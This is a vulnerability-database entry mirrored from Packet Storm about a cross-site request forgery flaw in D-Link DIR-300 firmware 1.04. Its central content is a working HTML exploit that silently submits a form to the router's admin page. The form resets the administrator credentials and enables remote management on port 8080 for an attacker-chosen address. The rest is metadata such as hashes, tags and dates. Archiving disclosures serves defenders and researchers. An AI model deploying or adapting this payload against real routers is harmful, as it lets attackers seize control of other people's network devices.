ID

VAR-E-201012-0955


TITLE

D-Link DIR-300 Cross Site Request Forgery

Trust: 0.5

sources: PACKETSTORM: 96777

DESCRIPTION

D-Link DIR-300 suffers from a cross site request forgery vulnerability.

Trust: 0.5

sources: PACKETSTORM: 96777

AFFECTED PRODUCTS

vendor:d linkmodel:dir-300scope: - version: -

Trust: 0.5

sources: PACKETSTORM: 96777

EXPLOIT

<!--

[+] Title: D-Link DIR-300 CSRF Vuln. (Change Admin Account Settings) PoC Exploit
[+] Description: Enable Remote Menagement for specific IP
[+] Firmware Version: 1.04
[+] Note: No need administrator to be logged (:
[+] Author: outlaw.dll
[+] Date: 17.12.2010
[+] Tested on: Windows 7 Ultimate (Google Chrome) but will work in any other OS

This firmware version is full of CSRF and other type of vulnerabilities.
W_o.O_W

-->
<form name="exploit" action="http://server/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0" method="post">
<input type="hidden" name="ACTION_POST" value="1" />
<input type="hidden" name="admin_name" value="outlaw.dll" />
<input type="hidden" name="admin_password1" value="1337" />
<input type="hidden" name="admin_password2" value="1337" />
<input type="hidden" name="rt_enable_h" value="1" />
<input type="hidden" name="rt_port" value="8080" />
<input type="hidden" name="rt_ipaddr" value="192.168.0.1337" />
</form>
<script>document.exploit.submit();</script>

Trust: 0.5

sources: PACKETSTORM: 96777

EXPLOIT HASH

LOCAL

SOURCE

md5: 083e234ec61b09e1889f1e42d3fc8d8c
sha-1: 5cf3b346c69d241e154a7aa9a2db6c352336e18f
sha-256: 4dd65f1f47ca740636fa5722f23e5b9764ea3b4b1e59312db89281f84927d9d6
md5: 083e234ec61b09e1889f1e42d3fc8d8c

Trust: 0.5

sources: PACKETSTORM: 96777

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 96777

TYPE

csrf

Trust: 0.5

sources: PACKETSTORM: 96777

TAGS

tag:exploit

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 96777

CREDITS

outlaw.dll

Trust: 0.5

sources: PACKETSTORM: 96777

EXTERNAL IDS

db:PACKETSTORMid:96777

Trust: 0.5

sources: PACKETSTORM: 96777

SOURCES

db:PACKETSTORMid:96777

LAST UPDATE DATE

2022-07-27T09:45:35.220000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:96777date:2010-12-17T20:03:37